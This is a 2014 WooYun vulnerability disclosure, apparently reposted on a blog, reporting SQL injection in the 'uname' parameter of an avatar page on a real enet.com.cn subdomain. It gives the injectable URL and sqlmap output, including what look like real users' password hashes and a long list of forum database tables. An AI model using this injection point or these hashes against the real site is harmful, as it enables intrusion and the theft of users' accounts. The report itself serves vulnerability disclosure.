硅谷动力某子站SQL注射漏洞泄露大量用户数据

admin
admin
admin
146004
文章
119
评论
2015年7月19日16:10:36评论217 views字数 220阅读0分44秒阅读模式
摘要

2014-10-26: 细节已通知厂商并且等待厂商处理中
2014-10-26: 厂商已查看当前漏洞内容,细节仅向厂商公开
2014-10-31: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(2) 关注此漏洞

缺陷编号: WooYun-2014-80855

漏洞标题: 硅谷动力某子站SQL注射漏洞泄露大量用户数据

相关厂商: enet.com.cn

漏洞作者: 老和尚

提交时间: 2014-10-26 22:46

公开时间: 2014-10-31 22:48

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 19

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

0人收藏

漏洞详情

披露状态:

2014-10-26: 细节已通知厂商并且等待厂商处理中
2014-10-26: 厂商已查看当前漏洞内容,细节仅向厂商公开
2014-10-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

勉强写个19吧、向一哥看齐、

详细说明:

漏洞存在页面:http://ucenter.enet.com.cn/avatar.php?uname=igrid2013'&size=samll

存在注入参数:uname=

一千多张表啊。

“一张表就有一百多万数据。”

code 区域 
[22:33:01] [INFO] the SQL query used returns 1845296 entries
 due to huge table size do you want to remove ORDER BY clause gaining speed over
 consistency? [y/N]
 [22:33:07] [INFO] retrieved: -1
 [22:33:09] [INFO] retrieved:
 [22:33:10] [INFO] retrieved: -1
 [22:33:11] [INFO] retrieved: 9d803addda5fcb9e91d4a31718294344
 [22:33:12] [INFO] retrieved: -1
 [22:33:14] [INFO] retrieved: c2338375359e9883d65d6e001f3ddcd1
 [22:33:15] [INFO] retrieved: -1
 [22:33:16] [INFO] retrieved: 25f9e794323b453885f5181f1b624d0b
 [22:33:17] [INFO] retrieved: -1
 [22:33:19] [INFO] retrieved:
 [22:33:20] [INFO] retrieved: -1
 [22:33:21] [INFO] retrieved: 4e7fd0a62fe85393cc2e661e8d7864a8
 [22:33:22] [INFO] retrieved: -1
 [22:33:24] [INFO] retrieved:
 [22:33:25] [INFO] retrieved: -1
 [22:33:26] [INFO] retrieved:
 [22:33:27] [INFO] retrieved: -1
 [22:33:29] [INFO] retrieved: 96e79218965eb72c92a549dd5a330112
 [22:33:30] [INFO] retrieved: -1
 [22:33:31] [INFO] retrieved: 723d505516e0c197e42a6be3c0af910e
 [22:33:32] [INFO] retrieved: -1
 [22:33:34] [INFO] retrieved: abf156f3cf64496f9da2cabca68d95fe
 [22:33:35] [INFO] retrieved: -1

这么多表,我也就不测试了。

论坛导致千万数据泄漏啊。表貌似也有很多。

code 区域 
1419 tables]
 +------------------------------------+
 | #mysql50#[]bbs_searchindex         |
 | [Table]admins                      |
 | [Table]applications                |
 | [Table]badwords                    |
 | [Table]domains                     |
 | [Table]failedlogins                |
 | [Table]feeds                       |
 | [Table]friends                     |
 | [Table]mailqueue                   |
 | [Table]memberfields                |
 | [Table]members                     |
 | [Table]mergemembers                |
 | [Table]newpm                       |
 | [Table]notelist                    |
 | [Table]pct_ah                      |
 | [Table]pm_indexes                  |
 | [Table]pm_lists                    |
 | [Table]pm_members                  |
 | [Table]pm_messages_0               |
 | [Table]pm_messages_1               |
 | [Table]pm_messages_2               |
 | [Table]pm_messages_3               |
 | [Table]pm_messages_4               |
 | [Table]pm_messages_5               |
 | [Table]pm_messages_6               |
 | [Table]pm_messages_7               |
 | [Table]pm_messages_8               |
 | [Table]pm_messages_9               |
 | [Table]pms                         |
 | [Table]protectedmembers            |
 | [Table]settings                    |
 | [Table]sqlcache                    |
 | [Table]tags                        |
 | [Table]thirdParty_bind             |
 | [Table]vars                        |
 | bbs_access                         |
 | bbs_activities                     |
 | bbs_activityapplies                |
 | bbs_addons                         |
 | bbs_adminactions                   |
 | bbs_admincustom                    |
 | bbs_admingroups                    |
 | bbs_adminnotes                     |
 | bbs_adminsessions                  |
 | bbs_advertisements                 |
 | bbs_announcements                  |
 | bbs_attachmentfields               |
 | bbs_attachments                    |
 | bbs_attachpaymentlog               |
 | bbs_attachtypes                    |
 | bbs_banklog                        |
 | bbs_bankstatus                     |
 | bbs_banned                         |
 | bbs_bbcodes                        |
 | bbs_caches                         |
 | bbs_court_judge                    |
 | bbs_court_lawsuit                  |
 | bbs_creditslog                     |
 | bbs_crons                          |
 | bbs_debateposts                    |
 | bbs_debates                        |
 | bbs_dropitem                       |
 | bbs_failedlogins                   |
 | bbs_faqs                           |
 | bbs_favoriteforums                 |
 | bbs_favorites                      |
 | bbs_favoritethreads                |
 | bbs_feeds                          |
 | bbs_forumfields                    |
 | bbs_forumlinks                     |
 | bbs_forumrecommend                 |
 | bbs_forums                         |
 | bbs_imagetypes                     |
 | bbs_invites                        |
 | bbs_itemmarket                     |
 | bbs_itempool                       |
 | bbs_jhzhufu                        |
 | bbs_jie                            |
 | bbs_ks_mod                         |
 | bbs_ks_mod_admin                   |
 | bbs_ks_mod_czlog                   |
 | bbs_ks_mod_log                     |
 | bbs_ks_mod_money                   |
 | bbs_ks_mod_pingjia                 |
 | bbs_ks_mod_pm                      |
 | bbs_lihun                          |
 | bbs_magiclog                       |
 | bbs_magicmarket                    |
 | bbs_magics                         |
 | bbs_medallog                       |
 | bbs_medals                         |
 | bbs_memberfields                   |
 | bbs_membermagics                   |
 | bbs_memberrecommend                |
 | bbs_members                        |
 | bbs_members_bak                    |
 | bbs_members_bak_bak                |
 | bbs_memberspaces                   |
 | bbs_mobdomlog                      |
 | bbs_moderators                     |
 | bbs_modworks                       |
 | bbs_mypetatk                       |
 | bbs_mypetdata                      |
 | bbs_myposts                        |
 | bbs_mytasks                        |
 | bbs_mythreads                      |
 | bbs_navs                           |
 | bbs_npcdata                        |
 | bbs_onlinelist                     |
 | bbs_onlinetime                     |
 | bbs_orders                         |
 | bbs_paymentlog                     |
 | bbs_petconfig                      |
 | bbs_petdeldata                     |
 | bbs_pethecheng                     |
 | bbs_petjobdata                     |
 | bbs_petshopdata                    |
 | bbs_pluginhooks                    |
 | bbs_plugins                        |
 | bbs_pluginvars                     |
 | bbs_polloptions                    |
 | bbs_polls                          |
 | bbs_postban                        |
 | bbs_postposition                   |
 | bbs_posts                          |
 | bbs_profilefields                  |
 | bbs_projects                       |
 | bbs_promotions                     |
 | bbs_prompt                         |
 | bbs_promptmsgs                     |
 | bbs_prompttype                     |
 | bbs_qiuhun                         |
 | bbs_ranks                          |
 | bbs_ratelog                        |
 | bbs_regips                         |
 | bbs_relatedthreads                 |
 | bbs_reportlog                      |
 | bbs_request                        |
 | bbs_rewardlog                      |
 | bbs_rsscaches                      |
 | bbs_searchindex                    |
 | bbs_sessions                       |
 | bbs_settings                       |
 | bbs_smilies                        |
 | bbs_spacecaches                    |
 | bbs_stats                          |
 | bbs_statvars                       |
 | bbs_styles                         |
 | bbs_stylevars                      |
 | bbs_tags                           |
 | bbs_tasks                          |
 | bbs_taskvars                       |
 | bbs_teammate                       |
 | bbs_templates                      |
 | bbs_threads                        |
 | bbs_threadsmod                     |
 | bbs_threadtags                     |
 | bbs_threadtypes                    |
 | bbs_timumembers                    |
 | bbs_tradecomments                  |
 | bbs_tradelog                       |
 | bbs_tradeoptionvars                |
 | bbs_trades                         |
 | bbs_typemodels                     |
 | bbs_typeoptions                    |
 | bbs_typeoptionvars                 |
 | bbs_typevars                       |
 | bbs_usergroups                     |
 | bbs_validating                     |
 | bbs_warnings                       |
 | bbs_words                          |
 | bbs_words_2                        |
 | bbs_words__                        |
 | bgbbs_access                       |
 | bgbbs_activities                   |
 | bgbbs_activityapplies              |
 | bgbbs_addons                       |
 | bgbbs_adminactions                 |
 | bgbbs_admincustom                  |
 | bgbbs_admingroups                  |
 | bgbbs_adminnotes                   |
 | bgbbs_adminsessions                |
 | bgbbs_advertisements               |
 | bgbbs_announcements                |
 | bgbbs_attachmentfields             |
 | bgbbs_attachments                  |
 | bgbbs_attachpaymentlog             |
 | bgbbs_attachtypes                  |
 | bgbbs_banned                       |
 | bgbbs_bbcodes                      |
 | bgbbs_caches                       |
 | bgbbs_creditslog                   |
 | bgbbs_crons                        |
 | bgbbs_debateposts                  |
 | bgbbs_debates                      |
 | bgbbs_failedlogins                 |
 | bgbbs_faqs                         |
 | bgbbs_favoriteforums               |
 | bgbbs_favorites                    |
 | bgbbs_favoritethreads              |
 | bgbbs_feeds                        |
 | bgbbs_forumfields                  |
 | bgbbs_forumlinks                   |
 | bgbbs_forumrecommend               |
 | bgbbs_forums                       |
 | bgbbs_imagetypes                   |
 | bgbbs_invites                      |
 | bgbbs_itempool                     |
 | bgbbs_magiclog                     |
 | bgbbs_magicmarket                  |
 | bgbbs_magics                       |
 | bgbbs_medallog                     |
 | bgbbs_medals                       |
 | bgbbs_memberfields                 |
 | bgbbs_membermagics                 |
 | bgbbs_memberrecommend              |
 | bgbbs_members                      |
 | bgbbs_memberspaces                 |
 | bgbbs_moderators                   |
 | bgbbs_modworks                     |
 | bgbbs_myposts                      |
 | bgbbs_mytasks                      |
 | bgbbs_mythreads                    |
 | bgbbs_navs                         |
 | bgbbs_onlinelist                   |
 | bgbbs_onlinetime                   |
 | bgbbs_orders                       |
 | bgbbs_paymentlog                   |
 | bgbbs_pluginhooks                  |
 | bgbbs_plugins                      |
 | bgbbs_pluginvars                   |
 | bgbbs_polloptions                  |
 | bgbbs_polls                        |
 | bgbbs_postposition                 |
 | bgbbs_posts                        |
 | bgbbs_profilefields                |
 | bgbbs_projects                     |
 | bgbbs_promotions                   |
 | bgbbs_prompt                       |
 | bgbbs_promptmsgs                   |
 | bgbbs_prompttype                   |
 | bgbbs_ranks                        |
 | bgbbs_ratelog                      |
 | bgbbs_regips                       |
 | bgbbs_relatedthreads               |
 | bgbbs_reportlog                    |
 | bgbbs_request                      |
 | bgbbs_rewardlog                    |
 | bgbbs_rsscaches                    |
 | bgbbs_searchindex                  |
 | bgbbs_sessions                     |
 | bgbbs_settings                     |
 | bgbbs_smilies                      |
 | bgbbs_spacecaches                  |
 | bgbbs_stats                        |
 | bgbbs_statvars                     |
 | bgbbs_styles                       |
 | bgbbs_stylevars                    |
 | bgbbs_tags                         |
 | bgbbs_tasks                        |
 | bgbbs_taskvars                     |
 | bgbbs_templates                    |
 | bgbbs_threads                      |
 | bgbbs_threadsmod                   |
 | bgbbs_threadtags                   |
 | bgbbs_threadtypes                  |
 | bgbbs_tradecomments                |
 | bgbbs_tradelog                     |
 | bgbbs_tradeoptionvars              |
 | bgbbs_trades                       |
 | bgbbs_typemodels                   |
 | bgbbs_typeoptions                  |
 | bgbbs_typeoptionvars               |
 | bgbbs_typevars                     |
 | bgbbs_usergroups                   |
 | bgbbs_validating                   |
 | bgbbs_warnings                     |
 | bgbbs_words                        |
 | dcbbs_access                       |
 | dcbbs_activities                   |
 | dcbbs_activityapplies              |
 | dcbbs_addons                       |
 | dcbbs_adminactions                 |
 | dcbbs_admincustom                  |
 | dcbbs_admingroups                  |
 | dcbbs_adminnotes                   |
 | dcbbs_adminsessions                |
 | dcbbs_advertisements               |
 | dcbbs_announcements                |
 | dcbbs_attachmentfields             |
 | dcbbs_attachments                  |
 | dcbbs_attachpaymentlog             |
 | dcbbs_attachtypes                  |
 | dcbbs_banned                       |
 | dcbbs_bbcodes                      |
 | dcbbs_caches                       |
 | dcbbs_creditslog                   |
 | dcbbs_crons                        |
 | dcbbs_debateposts                  |
 | dcbbs_debates                      |
 | dcbbs_failedlogins                 |
 | dcbbs_faqs                         |
 | dcbbs_favoriteforums               |
 | dcbbs_favorites                    |
 | dcbbs_favoritethreads              |
 | dcbbs_feeds                        |
 | dcbbs_forumfields                  |
 | dcbbs_forumlinks                   |
 | dcbbs_forumrecommend               |
 | dcbbs_forums                       |
 | dcbbs_imagetypes                   |
 | dcbbs_invites                      |
 | dcbbs_itempool                     |
 | dcbbs_magiclog                     |
 | dcbbs_magicmarket                  |
 | dcbbs_magics                       |
 | dcbbs_medallog                     |
 | dcbbs_medals                       |
 | dcbbs_memberfields                 |
 | dcbbs_membermagics                 |
 | dcbbs_memberrecommend              |
 | dcbbs_members                      |
 | dcbbs_memberspaces                 |
 | dcbbs_moderators                   |
 | dcbbs_modworks                     |
 | dcbbs_myposts                      |
 | dcbbs_mytasks                      |
 | dcbbs_mythreads                    |
 | dcbbs_navs                         |
 | dcbbs_onlinelist                   |
 | dcbbs_onlinetime                   |
 | dcbbs_orders                       |
 | dcbbs_paymentlog                   |
 | dcbbs_pluginhooks                  |
 | dcbbs_plugins                      |
 | dcbbs_pluginvars                   |
 | dcbbs_polloptions                  |
 | dcbbs_polls                        |
 | dcbbs_postposition                 |
 | dcbbs_posts                        |
 | dcbbs_profilefields                |
 | dcbbs_projects                     |
 | dcbbs_promotions                   |
 | dcbbs_prompt                       |
 | dcbbs_promptmsgs                   |
 | dcbbs_prompttype                   |
 | dcbbs_ranks                        |
 | dcbbs_ratelog                      |
 | dcbbs_regips                       |
 | dcbbs_relatedthreads               |
 | dcbbs_reportlog                    |
 | dcbbs_request                      |
 | dcbbs_rewardlog                    |
 | dcbbs_rsscaches                    |
 | dcbbs_searchindex                  |
 | dcbbs_sessions                     |
 | dcbbs_settings                     |
 | dcbbs_smilies                      |
 | dcbbs_spacecaches                  |
 | dcbbs_stats                        |
 | dcbbs_statvars                     |
 | dcbbs_styles                       |
 | dcbbs_stylevars                    |
 | dcbbs_tags                         |
 | dcbbs_tasks                        |
 | dcbbs_taskvars                     |
 | dcbbs_templates                    |
 | dcbbs_threads                      |
 | dcbbs_threadsmod                   |
 | dcbbs_threadtags                   |
 | dcbbs_threadtypes                  |
 | dcbbs_tradecomments                |
 | dcbbs_tradelog                     |
 | dcbbs_tradeoptionvars              |
 | dcbbs_trades                       |
 | dcbbs_typemodels                   |
 | dcbbs_typeoptions                  |
 | dcbbs_typeoptionvars               |
 | dcbbs_typevars                     |
 | dcbbs_usergroups                   |
 | dcbbs_validating                   |
 | dcbbs_warnings                     |
 | dcbbs_words                        |
 | diybbs_access                      |
 | diybbs_activities                  |
 | diybbs_activityapplies             |
 | diybbs_addons                      |
 | diybbs_adminactions                |
 | diybbs_admincustom                 |
 | diybbs_admingroups                 |
 | diybbs_adminnotes                  |
 | diybbs_adminsessions               |
 | diybbs_advertisements              |
 | diybbs_announcements               |
 | diybbs_attachmentfields            |
 | diybbs_attachments                 |
 | diybbs_attachments_bak             |
 | diybbs_attachpaymentlog            |
 | diybbs_attachtypes                 |
 | diybbs_banned                      |
 | diybbs_bbcodes                     |
 | diybbs_caches                      |
 | diybbs_creditslog                  |
 | diybbs_crons                       |
 | diybbs_debateposts                 |
 | diybbs_debates                     |
 | diybbs_failedlogins                |
 | diybbs_faqs                        |
 | diybbs_favoriteforums              |
 | diybbs_favorites                   |
 | diybbs_favoritethreads             |
 | diybbs_feeds                       |
 | diybbs_forumfields                 |
 | diybbs_forumlinks                  |
 | diybbs_forumrecommend              |
 | diybbs_forums                      |
 | diybbs_imagetypes                  |
 | diybbs_invites                     |
 | diybbs_itempool                    |
 | diybbs_magiclog                    |
 | diybbs_magicmarket                 |
 | diybbs_magics                      |
 | diybbs_medallog                    |
 | diybbs_medals                      |
 | diybbs_memberfields                |
 | diybbs_membermagics                |
 | diybbs_memberrecommend             |
 | diybbs_members                     |
 | diybbs_memberspaces                |
 | diybbs_moderators                  |
 | diybbs_modworks                    |
 | diybbs_myposts                     |
 | diybbs_mytasks                     |
 | diybbs_mythreads                   |
 | diybbs_navs                        |
 | diybbs_onlinelist                  |
 | diybbs_onlinetime                  |
 | diybbs_orders                      |
 | diybbs_paymentlog                  |
 | diybbs_pluginhooks                 |
 | diybbs_plugins                     |
 | diybbs_pluginvars                  |
 | diybbs_polloptions                 |
 | diybbs_polls                       |
 | diybbs_postposition                |
 | diybbs_posts                       |
 | diybbs_posts_bak                   |
 | diybbs_profilefields               |
 | diybbs_projects                    |
 | diybbs_promotions                  |
 | diybbs_prompt                      |
 | diybbs_promptmsgs                  |
 | diybbs_prompttype                  |
 | diybbs_ranks                       |
 | diybbs_ratelog                     |
 | diybbs_regips                      |
 | diybbs_relatedthreads              |
 | diybbs_reportlog                   |
 | diybbs_request                     |
 | diybbs_rewardlog                   |
 | diybbs_rsscaches                   |
 | diybbs_searchindex                 |
 | diybbs_sessions                    |
 | diybbs_settings                    |
 | diybbs_smilies                     |
 | diybbs_spacecaches                 |
 | diybbs_stats                       |
 | diybbs_statvars                    |
 | diybbs_styles                      |
 | diybbs_stylevars                   |
 | diybbs_tags                        |
 | diybbs_tasks                       |
 | diybbs_taskvars                    |
 | diybbs_templates                   |
 | diybbs_threads                     |
 | diybbs_threads_bak                 |
 | diybbs_threadsmod                  |
 | diybbs_threadtags                  |
 | diybbs_threadtypes                 |
 | diybbs_tradecomments               |
 | diybbs_tradelog                    |
 | diybbs_tradeoptionvars             |
 | diybbs_trades                      |
 | diybbs_typemodels                  |
 | diybbs_typeoptions                 |
 | diybbs_typeoptionvars              |
 | diybbs_typevars                    |
 | diybbs_usergroups                  |
 | diybbs_validating                  |
 | diybbs_warnings                    |
 | diybbs_words                       |
 | ehomebbs_access                    |
 | ehomebbs_activities                |
 | ehomebbs_activityapplies           |
 | ehomebbs_addons                    |
 | ehomebbs_adminactions              |
 | ehomebbs_admincustom               |
 | ehomebbs_admingroups               |
 | ehomebbs_adminnotes                |
 | ehomebbs_adminsessions             |
 | ehomebbs_advertisements            |
 | ehomebbs_announcements             |
 | ehomebbs_attachmentfields          |
 | ehomebbs_attachments               |
 | ehomebbs_attachpaymentlog          |
 | ehomebbs_attachtypes               |
 | ehomebbs_banned                    |
 | ehomebbs_bbcodes                   |
 | ehomebbs_caches                    |
 | ehomebbs_creditslog                |
 | ehomebbs_crons                     |
 | ehomebbs_debateposts               |
 | ehomebbs_debates                   |
 | ehomebbs_failedlogins              |
 | ehomebbs_faqs                      |
 | ehomebbs_favoriteforums            |
 | ehomebbs_favorites                 |
 | ehomebbs_favoritethreads           |
 | ehomebbs_feeds                     |
 | ehomebbs_forumfields               |
 | ehomebbs_forumlinks                |
 | ehomebbs_forumrecommend            |
 | ehomebbs_forums                    |
 | ehomebbs_imagetypes                |
 | ehomebbs_invites                   |
 | ehomebbs_itempool                  |
 | ehomebbs_magiclog                  |
 | ehomebbs_magicmarket               |
 | ehomebbs_magics                    |
 | ehomebbs_medallog                  |
 | ehomebbs_medals                    |
 | ehomebbs_memberfields              |
 | ehomebbs_memberfields1             |
 | ehomebbs_membermagics              |
 | ehomebbs_memberrecommend           |
 | ehomebbs_members                   |
 | ehomebbs_members1                  |
 | ehomebbs_memberspaces              |
 | ehomebbs_moderators                |
 | ehomebbs_modworks                  |
 | ehomebbs_myposts                   |
 | ehomebbs_mytasks                   |
 | ehomebbs_mythreads                 |
 | ehomebbs_navs                      |
 | ehomebbs_onlinelist                |
 | ehomebbs_onlinetime                |
 | ehomebbs_orders                    |
 | ehomebbs_paymentlog                |
 | ehomebbs_pluginhooks               |
 | ehomebbs_plugins                   |
 | ehomebbs_pluginvars                |
 | ehomebbs_polloptions               |
 | ehomebbs_polls                     |
 | ehomebbs_postposition              |
 | ehomebbs_posts                     |
 | ehomebbs_profilefields             |
 | ehomebbs_projects                  |
 | ehomebbs_promotions                |
 | ehomebbs_prompt                    |
 | ehomebbs_promptmsgs                |
 | ehomebbs_prompttype                |
 | ehomebbs_ranks                     |
 | ehomebbs_ratelog                   |
 | ehomebbs_regips                    |
 | ehomebbs_relatedthreads            |
 | ehomebbs_reportlog                 |
 | ehomebbs_request                   |
 | ehomebbs_rewardlog                 |
 | ehomebbs_rsscaches                 |
 | ehomebbs_searchindex               |
 | ehomebbs_sessions                  |
 | ehomebbs_settings                  |
 | ehomebbs_smilies                   |
 | ehomebbs_spacecaches               |
 | ehomebbs_stats                     |
 | ehomebbs_statvars                  |
 | ehomebbs_styles                    |
 | ehomebbs_stylevars                 |
 | ehomebbs_tags                      |
 | ehomebbs_tasks                     |
 | ehomebbs_taskvars                  |
 | ehomebbs_templates                 |
 | ehomebbs_threads                   |
 | ehomebbs_threadsmod                |
 | ehomebbs_threadtags                |
 | ehomebbs_threadtypes               |
 | ehomebbs_tradecomments             |
 | ehomebbs_tradelog                  |
 | ehomebbs_tradeoptionvars           |
 | ehomebbs_trades                    |
 | ehomebbs_typemodels                |
 | ehomebbs_typeoptions               |
 | ehomebbs_typeoptionvars            |
 | ehomebbs_typevars                  |
 | ehomebbs_usergroups                |
 | ehomebbs_usergroups1               |
 | ehomebbs_validating                |
 | ehomebbs_warnings                  |
 | ehomebbs_words                     |
 | fbbs_access                        |
 | fbbs_activities                    |
 | fbbs_activityapplies               |
 | fbbs_addons                        |
 | fbbs_adminactions                  |
 | fbbs_admincustom                   |
 | fbbs_admingroups                   |
 | fbbs_adminnotes                    |
 | fbbs_adminsessions                 |
 | fbbs_advertisements                |
 | fbbs_announcements                 |
 | fbbs_attachmentfields              |
 | fbbs_attachments                   |
 | fbbs_attachpaymentlog              |
 | fbbs_attachtypes                   |
 | fbbs_banned                        |
 | fbbs_bbcodes                       |
 | fbbs_caches                        |
 | fbbs_creditslog                    |
 | fbbs_crons                         |
 | fbbs_debateposts                   |
 | fbbs_debates                       |
 | fbbs_failedlogins                  |
 | fbbs_faqs                          |
 | fbbs_favoriteforums                |
 | fbbs_favorites                     |
 | fbbs_favoritethreads               |
 | fbbs_feeds                         |
 | fbbs_forumfields                   |
 | fbbs_forumlinks                    |
 | fbbs_forumrecommend                |
 | fbbs_forums                        |
 | fbbs_imagetypes                    |
 | fbbs_invites                       |
 | fbbs_itempool                      |
 | fbbs_magiclog                      |
 | fbbs_magicmarket                   |
 | fbbs_magics                        |
 | fbbs_medallog                      |
 | fbbs_medals                        |
 | fbbs_memberfields                  |
 | fbbs_membermagics                  |
 | fbbs_memberrecommend               |
 | fbbs_members                       |
 | fbbs_memberspaces                  |
 | fbbs_moderators                    |
 | fbbs_modworks                      |
 | fbbs_myposts                       |
 | fbbs_mytasks                       |
 | fbbs_mythreads                     |
 | fbbs_navs                          |
 | fbbs_onlinelist                    |
 | fbbs_onlinetime                    |
 | fbbs_orders                        |
 | fbbs_paymentlog                    |
 | fbbs_pluginhooks                   |
 | fbbs_plugins                       |
 | fbbs_pluginvars                    |
 | fbbs_polloptions                   |
 | fbbs_polls                         |
 | fbbs_postposition                  |
 | fbbs_posts                         |
 | fbbs_profilefields                 |
 | fbbs_projects                      |
 | fbbs_promotions                    |
 | fbbs_prompt                        |
 | fbbs_promptmsgs                    |
 | fbbs_prompttype                    |
 | fbbs_ranks                         |
 | fbbs_ratelog                       |
 | fbbs_regips                        |
 | fbbs_relatedthreads                |
 | fbbs_reportlog                     |
 | fbbs_request                       |
 | fbbs_rewardlog                     |
 | fbbs_rsscaches                     |
 | fbbs_searchindex                   |
 | fbbs_sessions                      |
 | fbbs_settings                      |
 | fbbs_smilies                       |
 | fbbs_spacecaches                   |
 | fbbs_stats                         |
 | fbbs_statvars                      |
 | fbbs_styles                        |
 | fbbs_stylevars                     |
 | fbbs_tags                          |
 | fbbs_tasks                         |
 | fbbs_taskvars                      |
 | fbbs_templates                     |
 | fbbs_threads                       |
 | fbbs_threadsmod                    |
 | fbbs_threadtags                    |
 | fbbs_threadtypes                   |
 | fbbs_tradecomments                 |
 | fbbs_tradelog                      |
 | fbbs_tradeoptionvars               |
 | fbbs_trades                        |
 | fbbs_typemodels                    |
 | fbbs_typeoptions                   |
 | fbbs_typeoptionvars                |
 | fbbs_typevars                      |
 | fbbs_usergroups                    |
 | fbbs_validating                    |
 | fbbs_warnings                      |
 | fbbs_words                         |
 | gamebbs_2fly_gift                  |
 | gamebbs_access                     |
 | gamebbs_activities                 |
 | gamebbs_activityapplies            |
 | gamebbs_addons                     |
 | gamebbs_adminactions               |
 | gamebbs_admincustom                |
 | gamebbs_admingroups                |
 | gamebbs_adminnotes                 |
 | gamebbs_adminsessions              |
 | gamebbs_advertisements             |
 | gamebbs_announcements              |
 | gamebbs_attachmentfields           |
 | gamebbs_attachments                |
 | gamebbs_attachpaymentlog           |
 | gamebbs_attachtypes                |
 | gamebbs_banned                     |
 | gamebbs_bbcodes                    |
 | gamebbs_caches                     |
 | gamebbs_creditslog                 |
 | gamebbs_crons                      |
 | gamebbs_debateposts                |
 | gamebbs_debates                    |
 | gamebbs_failedlogins               |
 | gamebbs_faqs                       |
 | gamebbs_favoriteforums             |
 | gamebbs_favorites                  |
 | gamebbs_favoritethreads            |
 | gamebbs_feeds                      |
 | gamebbs_forumfields                |
 | gamebbs_forumlinks                 |
 | gamebbs_forumrecommend             |
 | gamebbs_forums                     |
 | gamebbs_imagetypes                 |
 | gamebbs_invites                    |
 | gamebbs_itempool                   |
 | gamebbs_magiclog                   |
 | gamebbs_magicmarket                |
 | gamebbs_magics                     |
 | gamebbs_medallog                   |
 | gamebbs_medals                     |
 | gamebbs_memberfields               |
 | gamebbs_membermagics               |
 | gamebbs_memberrecommend            |
 | gamebbs_members                    |
 | gamebbs_memberspaces               |
 | gamebbs_moderators                 |
 | gamebbs_modworks                   |
 | gamebbs_msdct                      |
 | gamebbs_msdct_setting              |
 | gamebbs_myposts                    |
 | gamebbs_mytasks                    |
 | gamebbs_mythreads                  |
 | gamebbs_navs                       |
 | gamebbs_onlinelist                 |
 | gamebbs_onlinetime                 |
 | gamebbs_orders                     |
 | gamebbs_paymentlog                 |
 | gamebbs_pluginhooks                |
 | gamebbs_plugins                    |
 | gamebbs_pluginvars                 |
 | gamebbs_polloptions                |
 | gamebbs_polls                      |
 | gamebbs_postposition               |
 | gamebbs_posts                      |
 | gamebbs_profilefields              |
 | gamebbs_projects                   |
 | gamebbs_promotions                 |
 | gamebbs_prompt                     |
 | gamebbs_promptmsgs                 |
 | gamebbs_prompttype                 |
 | gamebbs_ranks                      |
 | gamebbs_ratelog                    |
 | gamebbs_regips                     |
 | gamebbs_relatedthreads             |
 | gamebbs_reportlog                  |
 | gamebbs_request                    |
 | gamebbs_rewardlog                  |
 | gamebbs_rsscaches                  |
 | gamebbs_searchindex                |
 | gamebbs_sessions                   |
 | gamebbs_settings                   |
 | gamebbs_smilies                    |
 | gamebbs_spacecaches                |
 | gamebbs_stats                      |
 | gamebbs_statvars                   |
 | gamebbs_styles                     |
 | gamebbs_stylevars                  |
 | gamebbs_tags                       |
 | gamebbs_tasks                      |
 | gamebbs_taskvars                   |
 | gamebbs_templates                  |
 | gamebbs_threads                    |
 | gamebbs_threadsmod                 |
 | gamebbs_threadtags                 |
 | gamebbs_threadtypes                |
 | gamebbs_tradecomments              |
 | gamebbs_tradelog                   |
 | gamebbs_tradeoptionvars            |
 | gamebbs_trades                     |
 | gamebbs_typemodels                 |
 | gamebbs_typeoptions                |
 | gamebbs_typeoptionvars             |
 | gamebbs_typevars                   |
 | gamebbs_usergroups                 |
 | gamebbs_validating                 |
 | gamebbs_warnings                   |
 | gamebbs_words                      |
 | mbbs_access                        |
 | mbbs_activities                    |
 | mbbs_activityapplies               |
 | mbbs_addons                        |
 | mbbs_adminactions                  |
 | mbbs_admincustom                   |
 | mbbs_admingroups                   |
 | mbbs_adminnotes                    |
 | mbbs_adminsessions                 |
 | mbbs_advertisements                |
 | mbbs_announcements                 |
 | mbbs_attachmentfields              |
 | mbbs_attachments                   |
 | mbbs_attachpaymentlog              |
 | mbbs_attachtypes                   |
 | mbbs_banned                        |
 | mbbs_bbcodes                       |
 | mbbs_caches                        |
 | mbbs_creditslog                    |
 | mbbs_crons                         |
 | mbbs_debateposts                   |
 | mbbs_debates                       |
 | mbbs_failedlogins                  |
 | mbbs_faqs                          |
 | mbbs_favoriteforums                |
 | mbbs_favorites                     |
 | mbbs_favoritethreads               |
 | mbbs_feeds                         |
 | mbbs_forumfields                   |
 | mbbs_forumlinks                    |
 | mbbs_forumrecommend                |
 | mbbs_forums                        |
 | mbbs_forums_copy                   |
 | mbbs_imagetypes                    |
 | mbbs_invites                       |
 | mbbs_itempool                      |
 | mbbs_magiclog                      |
 | mbbs_magicmarket                   |
 | mbbs_magics                        |
 | mbbs_medallog                      |
 | mbbs_medals                        |
 | mbbs_memberfields                  |
 | mbbs_membermagics                  |
 | mbbs_memberrecommend               |
 | mbbs_members                       |
 | mbbs_members_copy                  |
 | mbbs_memberspaces                  |
 | mbbs_moderators                    |
 | mbbs_modworks                      |
 | mbbs_myposts                       |
 | mbbs_mytasks                       |
 | mbbs_mythreads                     |
 | mbbs_navs                          |
 | mbbs_onlinelist                    |
 | mbbs_onlinetime                    |
 | mbbs_orders                        |
 | mbbs_paymentlog                    |
 | mbbs_pluginhooks                   |
 | mbbs_plugins                       |
 | mbbs_pluginvars                    |
 | mbbs_polloptions                   |
 | mbbs_polls                         |
 | mbbs_postposition                  |
 | mbbs_posts                         |
 | mbbs_profilefields                 |
 | mbbs_projects                      |
 | mbbs_promotions                    |
 | mbbs_prompt                        |
 | mbbs_promptmsgs                    |
 | mbbs_prompttype                    |
 | mbbs_ranks                         |
 | mbbs_ratelog                       |
 | mbbs_regips                        |
 | mbbs_relatedthreads                |
 | mbbs_reportlog                     |
 | mbbs_request                       |
 | mbbs_rewardlog                     |
 | mbbs_rsscaches                     |
 | mbbs_searchindex                   |
 | mbbs_sessions                      |
 | mbbs_settings                      |
 | mbbs_smilies                       |
 | mbbs_spacecaches                   |
 | mbbs_stats                         |
 | mbbs_statvars                      |
 | mbbs_styles                        |
 | mbbs_stylevars                     |
 | mbbs_tags                          |
 | mbbs_tasks                         |
 | mbbs_taskvars                      |
 | mbbs_templates                     |
 | mbbs_threads                       |
 | mbbs_threadsmod                    |
 | mbbs_threadtags                    |
 | mbbs_threadtypes                   |
 | mbbs_timumembers                   |
